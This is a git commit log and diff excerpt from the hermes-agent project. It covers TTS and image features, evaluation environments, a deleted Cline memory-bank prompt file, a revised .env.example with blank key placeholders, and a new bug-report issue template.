- Implemented caching of user-uploaded images in local directories to ensure reliable access for the vision tool, addressing issues with ephemeral URLs.
- Enhanced platform adapters (Discord, Telegram, WhatsApp) to download and cache images, allowing for immediate analysis and enriched message context.
- Added a new method to auto-analyze images attached by users, enriching the conversation with detailed descriptions.
- Improved documentation for image handling processes and updated related functions for clarity and efficiency.
2026-02-15 16:10:50 -08:00
teknium1
eb49936a60 Update documentation and installation scripts for TTS audio formats
- Clarified the requirements for Telegram voice bubbles, specifying the need for ffmpeg when using Edge TTS.
- Enhanced README and messaging documentation to detail audio delivery formats across platforms.
- Improved installation script messages to inform users about the necessity of ffmpeg for proper audio playback on Telegram.
2026-02-14 16:16:54 -08:00
teknium1
ff9ea6c4b1 Enhance TTS tool to support platform-specific audio formats
- Added detection of the platform from the environment variable to determine the appropriate audio output format.
- Implemented logic to output Opus (.ogg) files for Telegram when using compatible TTS providers, while defaulting to MP3 for others.
2026-02-14 16:13:26 -08:00
teknium1
586b0a7047 Add Text-to-Speech (TTS) support with Edge TTS and ElevenLabs integration
- Updated `pyproject.toml` to include Edge TTS and ElevenLabs as dependencies.
- Enhanced documentation to detail voice message capabilities across platforms and TTS provider options.
- Modified the GatewayRunner to handle MEDIA tags from TTS tool responses, ensuring proper delivery of audio messages.
2026-02-14 16:08:14 -08:00
teknium1
84718d183a Add platform-specific formatting hints and identity for AIAgent
- Introduced a default agent identity prompt to ensure consistent behavior across platforms.
- Added platform-specific formatting hints for CLI, WhatsApp, Telegram, and Discord to guide the agent's output style.
- Updated the AIAgent initialization to accept a platform parameter, enhancing adaptability to different interfaces.
2026-02-12 16:11:16 -08:00
teknium1
3099a2f53c Add timestamp to active system prompt in AIAgent
- Appended the current local date and time to the active system prompt to provide context for the model, addressing potential misinterpretations due to training cutoffs.
2026-02-12 15:59:31 -08:00
teknium1
ed010752dd Update .env.example to use new Docker, Singularity, and Modal images for Python 3.11 with Node.js 20 support 2026-02-12 10:07:03 -08:00
teknium1
f5be6177b2 Add Text-to-Speech (TTS) functionality with multiple providers
Add tool previews

Add AGENTS and SOUL.md support

Add Exec Approval
2026-02-12 10:05:08 -08:00
teknium
89c6f24d48 Merge branch 'main' of github.com:nousresearch/hermes-agent 2026-02-12 05:38:15 +00:00
teknium
f23856df8e Add kill_modal script to manage Modal applications and better handling of file and terminal tools
- Introduced a new script, `kill_modal.sh`, to facilitate stopping running Modal apps, including the ability to stop all apps or specific swe-rex sandboxes.
- Enhanced user experience with clear usage instructions and feedback during the stopping process.
- Improved error handling to ensure smooth execution even if some apps fail to stop.
2026-02-12 05:37:14 +00:00
teknium
1b7bc299f3 Enhance TerminalBench2 environment with task filtering due to incompat with modal and logging improvements
- Updated task filter descriptions for clarity and added a new skip task feature to exclude incompatible tasks.
- Introduced a set of modal incompatible tasks to prevent execution errors in cloud environments.
- Implemented streaming JSONL logging for task results, preserving data even on interruptions.
- Refactored task evaluation logic to include skipped task reporting and improved error handling.
2026-02-12 05:36:45 +00:00
teknium
a291cc99cf more extra kwarg support for provider selection etc on openrouter in agent rl envs and evals 2026-02-12 05:36:25 +00:00
teknium
389ac5e017 pass extrabody for agentloop to ban and allowlist providers on openrouter, control thinking, etc 2026-02-12 05:35:48 +00:00
nightwing
fc792a4be9 Update Project_notes.md: grailed-embedding-search status and TODOs (June 2025) 2026-02-11 17:54:47 -07:00
nightwing
07501bef14 Add Project_notes.md — centralized status tracker for all side projects 2026-02-11 17:36:18 -07:00
teknium1
137ce05324 Add image generation tool to toolsets for messaging platforms
- Included "image_generate" in the toolsets for web, vision, and skills categories, expanding functionality for image-related tasks.
- Updated comments for clarity on the new tool's purpose, ensuring users understand its integration within the existing framework.
2026-02-10 21:04:24 -08:00
teknium1
ada0b4f131 Enhance image handling in platform adapters
- Updated the image generation function description to clarify usage with markdown.
- Added `send_image` method to `BasePlatformAdapter` for native image sending across platforms.
- Implemented `send_image` in `DiscordAdapter` and `TelegramAdapter` to handle image attachments directly.
- Introduced `extract_images` method to extract image URLs from markdown and HTML, improving content processing.
- Enhanced message handling to support sending images as attachments while maintaining text content.
2026-02-10 21:02:40 -08:00
teknium
abe925e212 Update hermes-discord toolset to enable full terminal access with safety checks
- Revised the description to reflect full access capabilities, including terminal usage with a dangerous command approval system.
- Added terminal and file manipulation tools to the toolset, enhancing functionality for users.
- Updated comments for clarity on tool purposes, ensuring better understanding of available features.
2026-02-11 04:44:30 +00:00
teknium1
8fb44608bf Update SKILL.md and related references to implement container binding for labeled shapes and arrows in Excalidraw
- Revised the labeled shape and arrow sections to utilize container binding instead of the deprecated "label" property, ensuring proper text rendering.
- Added warnings about the invalidity of the "label" property and emphasized the use of `boundElements` for text elements.
- Updated examples in dark-mode and general references to reflect the new binding approach, enhancing clarity and usability for users creating diagrams.
2026-02-10 20:05:23 -08:00
teknium1
153cd5bb44 Refactor skills tool integration and enhance system prompt
- Removed the skills_categories tool from the skills toolset, streamlining the skills functionality to focus on skills_list and skill_view.
- Updated the system prompt to dynamically build a compact skills index, allowing the model to quickly reference available skills without additional tool calls.
- Cleaned up related code and documentation to reflect the removal of skills_categories, ensuring clarity and consistency across the codebase.
2026-02-10 19:48:38 -08:00
teknium1
669545f551 Add diagramming skills for Excalidraw
- Introduced a new DESCRIPTION.md file outlining diagram creation skills for visual diagrams and flowcharts using Excalidraw.
- Added SKILL.md for the Excalidraw skill, detailing its functionality, usage, and workflow for creating hand-drawn style diagrams.
- Created references for color palettes, dark mode diagrams, and example diagrams to assist users in utilizing the Excalidraw skill effectively.
- Implemented an upload script for sharing diagrams via Excalidraw.com, ensuring user-friendly access to generated diagrams.
2026-02-10 19:30:46 -08:00
teknium1
cfe2f3fe15 Implement interrupt handling for long-running tool executions in AIAgent
- Added functionality to signal and terminate long-running terminal commands when a new user message is received, allowing for immediate agent response.
- Introduced a global interrupt event in the terminal tool to facilitate early termination of subprocesses.
- Updated the AIAgent class to handle interrupts gracefully, ensuring that remaining tool calls are skipped and appropriate messages are returned to maintain valid message sequences.
2026-02-10 16:34:27 -08:00
teknium1
140d609e0c Refine agent history conversion logic in GatewayRunner
- Enhanced the conversion of message history to agent format by distinguishing between normal and rich agent messages.
- Implemented logic to preserve full message structure for tool-related messages, ensuring valid assistant-to-tool sequences.
- Simplified handling of simple text messages by stripping unnecessary fields while retaining essential role and content information.
2026-02-10 16:16:30 -08:00
teknium
a32ad1a656 Fix infinite interrupt loop in gateway by consuming pending messages with .pop() and clearing interrupt events before recursion
- Added logic to clear the adapter's interrupt event to prevent infinite loops during message processing.
- Updated the get_pending_message method to pop messages from the pending queue, ensuring proper message handling.
2026-02-11 00:05:30 +00:00
teknium1
62ba69a29d Fix gateway exit code to enable systemd auto-restart on connection failure
- Updated the start_gateway function to return a boolean indicating success or failure, allowing for better control over exit codes.
- Modified the main function to handle gateway startup failures, ensuring systemd can automatically restart on transient errors.
- Enhanced error handling in the hermes_cli gateway to exit with code 1 if the gateway fails to connect to any platform.
2026-02-10 16:01:00 -08:00
teknium1
9b0f2a16ca Enhance CLI functionality with retry and undo commands
- Added /retry command to resend the last user message, improving user experience by allowing message re-sending without retyping.
- Introduced /undo command to remove the last user/assistant exchange from conversation history, providing better control over conversation flow.
- Updated save_config_value function to respect user and project config precedence, enhancing configuration management.
- Improved prompt handling and visual output for user input, adapting to terminal width for better readability.
2026-02-10 15:59:46 -08:00
teknium
85e629e915 Add cleanup functionality for orphaned sandboxes in TerminalBench2EvalEnv
- Implemented a cleanup process to terminate any remaining sandboxes after evaluation, addressing issues with orphaned thread pool workers.
- Enhanced logging to inform users about the cleanup process, ensuring better resource management and user awareness.
2026-02-10 23:48:49 +00:00
teknium
999a28062d Implement graceful exit cleanup for terminal tool
- Added a new `_atexit_cleanup` function to handle cleanup of active environments and stop the cleanup thread upon program exit.
- Enhanced logging to inform users about the number of remaining sandboxes being shut down during cleanup.
2026-02-10 22:53:44 +00:00
teknium
ba3fea24f1 Enhance TerminalBench 2 configuration and evaluation handling
- Added task_timeout parameter to enforce a maximum wall-clock time for each task, automatically scoring as FAIL if exceeded.
- Introduced terminal_timeout and tool_pool_size parameters to improve command execution and concurrency management.
- Updated logging to provide detailed task execution times and timeout handling, enhancing overall monitoring.
- Removed outdated evaluate_config.yaml file to streamline configuration management.
2026-02-10 22:53:24 +00:00
teknium
6b4a8d0b17 Add terminal configuration options and enhance environment setup
- Introduced terminal_timeout and terminal_lifetime parameters to control command execution and sandbox inactivity.
- Updated environment variable handling to allow configuration overrides for terminal settings.
- Enhanced logging to provide detailed information about terminal settings during initialization.
- Added tool_pool_size parameter to dynamically resize the thread pool for tool execution, improving concurrency management.
2026-02-10 22:51:50 +00:00
teknium
5ec75e38b9 Enhance tool execution and logging in HermesAgentLoop
- Increased thread pool size for tool execution from 8 to 128 to improve concurrency and prevent starvation.
- Added a function to resize the tool executor dynamically based on configuration.
- Enhanced logging to track API call durations and tool execution times, including warnings for slow tools.
- Improved overall performance monitoring by logging detailed information for each turn in the agent loop.
2026-02-10 22:51:18 +00:00
teknium
ad042fdd68 Update terminalbench_2 configuration for enhanced performance and evaluation
- Increased max_token_length from 16000 to 32000 to allow for longer inputs.
- Adjusted agent_temperature from 0.6 to 0.8 for more varied responses.
- Extended test_timeout from 180 to 600 seconds to accommodate longer evaluations.
- Updated data directory path for saving evaluations to ensure proper organization.
2026-02-10 19:48:41 +00:00
teknium
35ad3146a8 Add new environments and enhance tool context functionality
- Introduced new environments: Terminal Test Environment and SWE Environment, each with default configurations for testing and software engineering tasks.
- Added TerminalBench 2.0 evaluation environment with comprehensive setup for agentic LLMs, including task execution and verification.
- Enhanced ToolContext with methods for uploading and downloading files, ensuring binary-safe operations.
- Updated documentation across environments to reflect new features and usage instructions.
- Refactored existing environment configurations for consistency and clarity.
2026-02-10 19:39:05 +00:00
teknium
e8343f2d87 Refactor Singularity environment for persistent container management
- Updated the _SingularityEnvironment class to utilize a persistent Apptainer instance, allowing state (files, installs, environment changes) to persist across commands.
- Enhanced the initialization process to start a background instance with full isolation and writable filesystem.
- Modified the execute method to connect to the running instance, ensuring commands run within the same container context.
- Implemented cleanup functionality to stop the persistent instance on cleanup or destruction, improving resource management.
- Updated class documentation to reflect new features and usage of the persistent environment.
2026-02-10 06:49:58 +00:00
teknium
1b1307d0d1 Implement Anthropic prompt caching for Claude models via OpenRouter
- Introduced a caching strategy that reduces input token costs by ~75% on multi-turn conversations by caching the conversation prefix.
- Added functions to apply cache control markers to messages, enhancing efficiency in token usage.
- Updated AIAgent to auto-enable prompt caching for Claude models, with configurable cache TTL.
- Enhanced logging to track cache hit statistics when caching is active, improving monitoring of token usage.
2026-02-10 06:49:41 +00:00
teknium
7a11be9f3f Enhance browser tool functionality and cleanup process
- Added checks for local installation of the agent-browser CLI in the `_find_agent_browser` function, improving installation guidance.
- Implemented per-task socket directory management in `_run_browser_command` to prevent concurrency issues.
- Updated `cleanup_browser` to remove per-task socket directories, ensuring proper resource cleanup after task completion.
- Refactored comments for clarity and improved documentation throughout the browser tool code.
2026-02-09 04:36:37 +00:00
826 changed files with 167537 additions and 33109 deletions

View File

@@ -1,115 +0,0 @@
# Cline's Memory Bank
I am Cline, an expert software engineer with a unique characteristic: my memory resets completely between sessions. This isn't a limitation - it's what drives me to maintain perfect documentation. After each reset, I rely ENTIRELY on my Memory Bank to understand the project and continue work effectively. I MUST read ALL memory bank files at the start of EVERY task - this is not optional.
## Memory Bank Structure
The Memory Bank consists of core files and optional context files, all in Markdown format. Files build upon each other in a clear hierarchy:
flowchart TD
PB[projectbrief.md] --> PC[productContext.md]
PB --> SP[systemPatterns.md]
PB --> TC[techContext.md]
PC --> AC[activeContext.md]
SP --> AC
TC --> AC
AC --> P[progress.md]
### Core Files (Required)
1. `projectbrief.md`
- Foundation document that shapes all other files
- Created at project start if it doesn't exist
- Defines core requirements and goals
- Source of truth for project scope
2. `productContext.md`
- Why this project exists
- Problems it solves
- How it should work
- User experience goals
3. `activeContext.md`
- Current work focus
- Recent changes
- Next steps
- Active decisions and considerations
- Important patterns and preferences
- Learnings and project insights
4. `systemPatterns.md`
- System architecture
- Key technical decisions
- Design patterns in use
- Component relationships
- Critical implementation paths
5. `techContext.md`
- Technologies used
- Development setup
- Technical constraints
- Dependencies
- Tool usage patterns
6. `progress.md`
- What works
- What's left to build
- Current status
- Known issues
- Evolution of project decisions
### Additional Context
Create additional files/folders within memory-bank/ when they help organize:
- Complex feature documentation
- Integration specifications
- API documentation
- Testing strategies
- Deployment procedures
## Core Workflows
### Plan Mode
flowchart TD
Start[Start] --> ReadFiles[Read Memory Bank]
ReadFiles --> CheckFiles{Files Complete?}
CheckFiles -->|No| Plan[Create Plan]
Plan --> Document[Document in Chat]
CheckFiles -->|Yes| Verify[Verify Context]
Verify --> Strategy[Develop Strategy]
Strategy --> Present[Present Approach]
### Act Mode
flowchart TD
Start[Start] --> Context[Check Memory Bank]
Context --> Update[Update Documentation]
Update --> Execute[Execute Task]
Execute --> Document[Document Changes]
## Documentation Updates
Memory Bank updates occur when:
1. Discovering new project patterns
2. After implementing significant changes
3. When user requests with **update memory bank** (MUST review ALL files)
4. When context needs clarification
flowchart TD
Start[Update Process]
subgraph Process
P1[Review ALL Files]
P2[Document Current State]
P3[Clarify Next Steps]
P4[Document Insights & Patterns]
P1 --> P2 --> P3 --> P4
end
Start --> Process
Note: When triggered by **update memory bank**, I MUST review every memory bank file, even if some don't require updates. Focus particularly on activeContext.md and progress.md as they track current state.
REMEMBER: After every memory reset, I begin completely fresh. The Memory Bank is my only link to previous work. It must be maintained with precision and clarity, as my effectiveness depends entirely on its accuracy.

View File

@@ -1,74 +1,50 @@
# Hermes Agent Environment Configuration
# Copy this file to .env and fill in your API keys
# =============================================================================
# CORE SETTINGS
# =============================================================================
# Agent backend:
# - openai : default Hermes-Agent loop (OpenAI function-calling via OpenAI SDK)
# - atropos : Atroposlib ServerManager/ManagedServer-backed loop (training/env integration)
HERMES_BACKEND=openai
# =============================================================================
# LOCAL / SELF-HOSTED OPENAI-COMPATIBLE ENDPOINTS (vLLM, SGLang, llama.cpp, etc.)
# =============================================================================
# For local development (matches the Atropos test env defaults):
# ATROPOS_SERVER_BASE_URL=http://127.0.0.1:8080
# ATROPOS_SERVER_MODEL=hermes-4-36b
# For hosted inference (Nous Research inference API):
ATROPOS_SERVER_BASE_URL=
ATROPOS_SERVER_MODEL=
ATROPOS_TOKENIZER_NAME=
# Set this to your Nous API key (Bearer token).
ATROPOS_SERVER_API_KEY=
# Debugging (prints to stdout; use with care)
# HERMES_DEBUG_ATROPOS_REQUEST=1
# HERMES_DEBUG_ATROPOS_RESPONSE=1
# HERMES_DEBUG_OPENAI_REQUEST=1
# HERMES_DEBUG_OPENAI_RESPONSE=1
# =============================================================================
# LOCAL / SELF-HOSTED OPENAI-COMPATIBLE ENDPOINTS (vLLM, SGLang, llama.cpp, etc.)
# =============================================================================
# If you set ATROPOS_SERVER_BASE_URL or OPENAI_BASE_URL, Hermes will use it instead
# of OpenRouter.
#
# Local server convenience (base URL without /v1):
# llama.cpp example (see `Hermes-Agent/scripts/launch_llama_cpp_hermes_4_36b.sh`):
# ATROPOS_SERVER_BASE_URL=http://127.0.0.1:8080
# ATROPOS_SERVER_MODEL=hermes-4-36b
# ATROPOS_TOKENIZER_NAME=NousResearch/Hermes-4.3-36B
# ATROPOS_SERVER_API_KEY=local
#
# Hosted Nous inference API:
# ATROPOS_SERVER_BASE_URL=https://inference-api.nousresearch.com
# ATROPOS_SERVER_MODEL=Hermes-4.3-36B
# ATROPOS_TOKENIZER_NAME=NousResearch/Hermes-4.3-36B
# ATROPOS_SERVER_API_KEY=sk-... (Bearer token)
#
# If you plan to run GRPO-style group sampling (e.g. `--env.group_size 4`) against
# llama.cpp, start the server with at least that many slots, e.g.:
# LLAMA_CPP_PARALLEL=4 Hermes-Agent/scripts/launch_llama_cpp_hermes_4_36b.sh
#
# Generic OpenAI-compatible (base URL should include /v1):
# OPENAI_BASE_URL=http://127.0.0.1:8080/v1
# OPENAI_API_KEY=local
# =============================================================================
# LLM PROVIDER (OpenRouter)
# =============================================================================
# OpenRouter provides access to many models through one API
# All LLM calls go through OpenRouter - no direct provider keys needed
# Get your key at: https://openrouter.ai/keys
OPENROUTER_BASE_URL=https://openrouter.ai/api/v1
OPENROUTER_API_KEY=
# Default model to use (OpenRouter format: provider/model)
# Examples: anthropic/claude-opus-4.6, openai/gpt-4o, google/gemini-2.0-flash, zhipuai/glm-4-plus
# Examples: anthropic/claude-opus-4.6, openai/gpt-4o, google/gemini-3-flash-preview, zhipuai/glm-4-plus
LLM_MODEL=anthropic/claude-opus-4.6
# =============================================================================
# LLM PROVIDER (z.ai / GLM)
# =============================================================================
# z.ai provides access to ZhipuAI GLM models (GLM-4-Plus, etc.)
# Get your key at: https://z.ai or https://open.bigmodel.cn
GLM_API_KEY=
# GLM_BASE_URL=https://api.z.ai/api/paas/v4 # Override default base URL
# =============================================================================
# LLM PROVIDER (Kimi / Moonshot)
# =============================================================================
# Kimi Code provides access to Moonshot AI coding models (kimi-k2.5, etc.)
# Get your key at: https://platform.kimi.ai (Kimi Code console)
# Keys prefixed sk-kimi- use the Kimi Code API (api.kimi.com) by default.
# Legacy keys from platform.moonshot.ai need KIMI_BASE_URL override below.
KIMI_API_KEY=
# KIMI_BASE_URL=https://api.kimi.com/coding/v1 # Default for sk-kimi- keys
# KIMI_BASE_URL=https://api.moonshot.ai/v1 # For legacy Moonshot keys
# KIMI_BASE_URL=https://api.moonshot.cn/v1 # For Moonshot China keys
# =============================================================================
# LLM PROVIDER (MiniMax)
# =============================================================================
# MiniMax provides access to MiniMax models (global endpoint)
# Get your key at: https://www.minimax.io
MINIMAX_API_KEY=
# MINIMAX_BASE_URL=https://api.minimax.io/v1 # Override default base URL
# MiniMax China endpoint (for users in mainland China)
MINIMAX_CN_API_KEY=
# MINIMAX_CN_BASE_URL=https://api.minimaxi.com/v1 # Override default base URL
# =============================================================================
# TOOL API KEYS
# =============================================================================
@@ -77,34 +53,38 @@ LLM_MODEL=anthropic/claude-opus-4.6
# Get at: https://firecrawl.dev/
FIRECRAWL_API_KEY=
# Nous Research API Key - Vision analysis and multi-model reasoning
# Get at: https://inference-api.nousresearch.com/
NOUS_API_KEY=
# FAL.ai API Key - Image generation
# Get at: https://fal.ai/
FAL_KEY=
# Honcho - Cross-session AI-native user modeling (optional)
# Builds a persistent understanding of the user across sessions and tools.
# Get at: https://app.honcho.dev
# Also requires ~/.honcho/config.json with enabled=true (see README).
HONCHO_API_KEY=
# =============================================================================
# TERMINAL TOOL CONFIGURATION (mini-swe-agent backend)
# =============================================================================
# Backend type: "local", "singularity", "docker", "modal", or "ssh"
# - local: Runs directly on your machine (fastest, no isolation)
# - ssh: Runs on remote server via SSH (great for sandboxing - agent can't touch its own code)
# - singularity: Runs in Apptainer/Singularity containers (HPC clusters, no root needed)
# - docker: Runs in Docker containers (isolated, requires Docker + docker group)
# - modal: Runs in Modal cloud sandboxes (scalable, requires Modal account)
TERMINAL_ENV=local
# Terminal backend is configured in ~/.hermes/config.yaml (terminal.backend).
# Use 'hermes setup' or 'hermes config set terminal.backend docker' to change.
# Supported: local, docker, singularity, modal, ssh
#
# Only override here if you need to force a backend without touching config.yaml:
# TERMINAL_ENV=local
# Container images (for singularity/docker/modal backends)
TERMINAL_DOCKER_IMAGE=python:3.11
TERMINAL_SINGULARITY_IMAGE=docker://python:3.11
TERMINAL_MODAL_IMAGE=python:3.11
# TERMINAL_DOCKER_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
# TERMINAL_SINGULARITY_IMAGE=docker://nikolaik/python-nodejs:python3.11-nodejs20
TERMINAL_MODAL_IMAGE=nikolaik/python-nodejs:python3.11-nodejs20
# Working directory for terminal commands
# For CLI: "." means current directory (resolved automatically from config.yaml)
# For containers (docker/singularity/modal): absolute path inside the container
# For local backend: "." means current directory (resolved automatically)
# For remote backends (ssh/docker/modal/singularity): use an absolute path
# INSIDE the target environment, or leave unset for the backend's default
# (/root for modal, / for docker, ~ for ssh). Do NOT use a host-local path.
# Usually managed by config.yaml (terminal.cwd) — uncomment to override
# TERMINAL_CWD=.
@@ -148,87 +128,12 @@ TERMINAL_LIFETIME_SECONDS=300
# SUDO_PASSWORD=your_password_here
# =============================================================================
# MODAL CLOUD BACKEND (for TERMINAL_ENV=modal)
# MODAL CLOUD BACKEND (Optional - for TERMINAL_ENV=modal)
# =============================================================================
# Modal provides cloud sandboxes with per-second billing and auto-scaling.
# This implementation uses a warm pool of sandboxes for cost efficiency.
#
# SETUP:
# pip install modal && modal setup
# (Authenticates via browser, stores credentials locally)
#
# FEATURES:
# - Auto-scaling warm sandbox pool (no cold start after first use)
# - Named sandbox recovery (reconnects after restart)
# - Profile-based heterogeneous environments (CPU, GPU, different images)
# - Server-side idle_timeout protection against orphaned sandboxes
# Modal app name (groups all sandboxes, used for recovery)
TERMINAL_MODAL_APP_NAME=hermes-sandbox
# Default profile when none specified
TERMINAL_MODAL_DEFAULT_PROFILE=default
# Profile config file (optional - YAML format, see modal_profiles.yaml)
# TERMINAL_MODAL_PROFILES_FILE=modal_profiles.yaml
# --- Default Profile Settings (used if no YAML file) ---
# These apply when no profile is specified or for the "default" profile
TERMINAL_MODAL_IMAGE=python:3.11
TERMINAL_MODAL_MIN_POOL=1
TERMINAL_MODAL_MAX_POOL=5
TERMINAL_MODAL_IDLE_TIMEOUT=120
TERMINAL_MODAL_MAX_LIFETIME=3600
TERMINAL_MODAL_SCALE_DOWN_IDLE=180
# --- Custom Profile Example: pytorch-gpu ---
# Uncomment to enable a GPU profile for ML tasks
# Usage: terminal_tool("python train.py", profile="pytorch-gpu")
#
# TERMINAL_MODAL_PROFILE_pytorch_gpu_IMAGE=pytorch/pytorch:2.1.0-cuda12.1-cudnn8-runtime
# TERMINAL_MODAL_PROFILE_pytorch_gpu_GPU=T4
# TERMINAL_MODAL_PROFILE_pytorch_gpu_MEMORY=16384
# TERMINAL_MODAL_PROFILE_pytorch_gpu_MIN_POOL=0
# TERMINAL_MODAL_PROFILE_pytorch_gpu_MAX_POOL=2
# TERMINAL_MODAL_PROFILE_pytorch_gpu_IDLE_TIMEOUT=60
# --- Custom Profile Example: node ---
# Uncomment to enable a Node.js profile
# Usage: terminal_tool("npm test", profile="node")
#
# TERMINAL_MODAL_PROFILE_node_IMAGE=node:18
# TERMINAL_MODAL_PROFILE_node_MIN_POOL=0
# TERMINAL_MODAL_PROFILE_node_MAX_POOL=3
# =============================================================================
# MODAL SECRETS (Secure credential injection)
# =============================================================================
# Modal Secrets allow you to securely pass API keys, passwords, and other
# sensitive data to your sandboxes without exposing them in code or logs.
#
# SETUP SECRETS:
# 1. Via Dashboard: https://modal.com/secrets
# 2. Via CLI: modal secret create my-secret KEY1=value1 KEY2=value2
# 3. Via CLI with env: modal secret create my-secret API_KEY="$API_KEY"
#
# LIST SECRETS:
# modal secret list
#
# DELETE SECRETS:
# modal secret delete my-secret
# Global secrets applied to ALL profiles (comma-separated secret names)
# These secrets must be created on Modal dashboard or via CLI first
# TERMINAL_MODAL_SECRETS=my-api-keys,database-creds
# Per-profile secrets (comma-separated secret names)
# TERMINAL_MODAL_PROFILE_pytorch_gpu_SECRETS=huggingface-token,wandb-key
# Per-profile environment variables (semicolon-separated KEY=VALUE pairs)
# TERMINAL_MODAL_PROFILE_default_ENV_VARS=DEBUG=1;LOG_LEVEL=info
# Load local .env file into sandbox (useful for development)
# TERMINAL_MODAL_PROFILE_default_USE_DOTENV=true
# Modal uses CLI authentication, not environment variables.
# Run: pip install modal && modal setup
# This will authenticate via browser and store credentials locally.
# No API key needed in .env - Modal handles auth automatically.
# =============================================================================
# BROWSER TOOL CONFIGURATION (agent-browser + Browserbase)
@@ -271,16 +176,43 @@ BROWSER_INACTIVITY_TIMEOUT=120
# Contains full conversation history in trajectory format for debugging/replay
# =============================================================================
# LEGACY/OPTIONAL API KEYS
# VOICE TRANSCRIPTION & OPENAI TTS
# =============================================================================
# Required for voice message transcription (Whisper) and OpenAI TTS voices.
# Uses OpenAI's API directly (not via OpenRouter).
# Named VOICE_TOOLS_OPENAI_KEY to avoid interference with OpenRouter.
# Get at: https://platform.openai.com/api-keys
VOICE_TOOLS_OPENAI_KEY=
# Morph API Key - For legacy Hecate terminal backend (terminal-hecate tool)
# Get at: https://morph.so/
MORPH_API_KEY=
# =============================================================================
# SLACK INTEGRATION
# =============================================================================
# Slack Bot Token - From Slack App settings (OAuth & Permissions)
# Get at: https://api.slack.com/apps
# SLACK_BOT_TOKEN=xoxb-...
# Hecate VM Settings (only if using terminal-hecate tool)
HECATE_VM_LIFETIME_SECONDS=300
HECATE_DEFAULT_SNAPSHOT_ID=snapshot_p5294qxt
# Slack App Token - For Socket Mode (App-Level Tokens in Slack App settings)
# SLACK_APP_TOKEN=xapp-...
# Slack allowed users (comma-separated Slack user IDs)
# SLACK_ALLOWED_USERS=
# WhatsApp (built-in Baileys bridge — run `hermes whatsapp` to pair)
# WHATSAPP_ENABLED=false
# WHATSAPP_ALLOWED_USERS=15551234567
# Gateway-wide: allow ALL users without an allowlist (default: false = deny)
# Only set to true if you intentionally want open access.
# GATEWAY_ALLOW_ALL_USERS=false
# =============================================================================
# RESPONSE PACING
# =============================================================================
# Human-like delays between message chunks on messaging platforms.
# Makes the bot feel less robotic.
# HERMES_HUMAN_DELAY_MODE=off # off | natural | custom
# HERMES_HUMAN_DELAY_MIN_MS=800 # Min delay in ms (custom mode)
# HERMES_HUMAN_DELAY_MAX_MS=2500 # Max delay in ms (custom mode)
# =============================================================================
# DEBUG OPTIONS
@@ -296,9 +228,10 @@ IMAGE_TOOLS_DEBUG=false
# When conversation approaches model's context limit, middle turns are
# automatically summarized to free up space.
#
# Context compression is configured in ~/.hermes/config.yaml under compression:
# CONTEXT_COMPRESSION_ENABLED=true # Enable auto-compression (default: true)
# CONTEXT_COMPRESSION_THRESHOLD=0.85 # Compress at 85% of context limit
# CONTEXT_COMPRESSION_MODEL=google/gemini-2.0-flash-001 # Fast model for summaries
# Model is set via compression.summary_model in config.yaml (default: google/gemini-3-flash-preview)
# =============================================================================
# RL TRAINING (Tinker + Atropos)
@@ -317,3 +250,16 @@ WANDB_API_KEY=
# RL API Server URL (default: http://localhost:8080)
# Change if running the rl-server on a different host/port
# RL_API_URL=http://localhost:8080
# =============================================================================
# SKILLS HUB (GitHub integration for skill search/install/publish)
# =============================================================================
# GitHub Personal Access Token — for higher API rate limits on skill search/install
# Get at: https://github.com/settings/tokens (Fine-grained recommended)
# GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxx
# GitHub App credentials (optional — for bot identity on PRs)
# GITHUB_APP_ID=
# GITHUB_APP_PRIVATE_KEY_PATH=
# GITHUB_APP_INSTALLATION_ID=

144
.github/ISSUE_TEMPLATE/bug_report.yml vendored Normal file
View File

@@ -0,0 +1,144 @@
name: "🐛 Bug Report"
description: Report a bug — something that's broken, crashes, or behaves incorrectly.
title: "[Bug]: "
labels: ["bug"]
body:
- type: markdown
attributes:
value: |
Thanks for reporting a bug! Please fill out the sections below so we can reproduce and fix it quickly.
**Before submitting**, please:
- [ ] Search [existing issues](https://github.com/NousResearch/hermes-agent/issues) to avoid duplicates
- [ ] Update to the latest version (`hermes update`) and confirm the bug still exists
- type: textarea
id: description
attributes:
label: Bug Description
description: A clear description of what's broken. Include error messages, tracebacks, or screenshots if relevant.
placeholder: |
What happened? What did you expect to happen instead?
validations:
required: true
- type: textarea
id: reproduction
attributes:
label: Steps to Reproduce
description: Minimal steps to trigger the bug. The more specific, the faster we can fix it.
placeholder: |
1. Run `hermes chat`
2. Send the message "..."
3. Agent calls tool X
4. Error appears: ...
validations:
required: true
- type: textarea
id: expected
attributes:
label: Expected Behavior
description: What should have happened instead?
validations:
required: true
- type: textarea
id: actual
attributes:
label: Actual Behavior
description: What actually happened? Include full error output if available.
validations:
required: true
- type: dropdown
id: component
attributes:
label: Affected Component
description: Which part of Hermes is affected?
multiple: true
options:
- CLI (interactive chat)
- Gateway (Telegram/Discord/Slack/WhatsApp)
- Setup / Installation
- Tools (terminal, file ops, web, code execution, etc.)
- Skills (skill loading, skill hub, skill guard)
- Agent Core (conversation loop, context compression, memory)
- Configuration (config.yaml, .env, hermes setup)
- Other
validations:
required: true
- type: dropdown
id: platform
attributes:
label: Messaging Platform (if gateway-related)
description: Which platform adapter is affected?
multiple: true
options:
- N/A (CLI only)
- Telegram
- Discord
- Slack
- WhatsApp
- type: input
id: os
attributes:
label: Operating System
description: e.g. Ubuntu 24.04, macOS 15.2, Windows 11
placeholder: Ubuntu 24.04
validations:
required: true
- type: input
id: python-version
attributes:
label: Python Version
description: Output of `python --version`
placeholder: "3.11.9"
validations:
required: true
- type: input
id: hermes-version
attributes:
label: Hermes Version
description: Output of `hermes version`
placeholder: "2.1.0"
validations:
required: true
- type: textarea
id: logs
attributes:
label: Relevant Logs / Traceback
description: Paste any error output, traceback, or log messages. This will be auto-formatted as code.
render: shell
- type: textarea
id: root-cause
attributes:
label: Root Cause Analysis (optional)
description: |
If you've dug into the code and identified the root cause, share it here.
Include file paths, line numbers, and code snippets if possible. This massively speeds up fixes.
placeholder: |
The bug is in `gateway/run.py` line 949. `len(history)` counts session_meta entries
but `agent_messages` was built from filtered history...
- type: textarea
id: proposed-fix
attributes:
label: Proposed Fix (optional)
description: If you have a fix in mind (or a PR ready), describe it here.
placeholder: |
Replace `.get()` with `.pop()` on line 289 of `gateway/platforms/base.py`
to actually clear the pending message after retrieval.
- type: checkboxes
id: pr-ready
attributes:
label: Are you willing to submit a PR for this?
options:
- label: I'd like to fix this myself and submit a PR

11
.github/ISSUE_TEMPLATE/config.yml vendored Normal file
View File

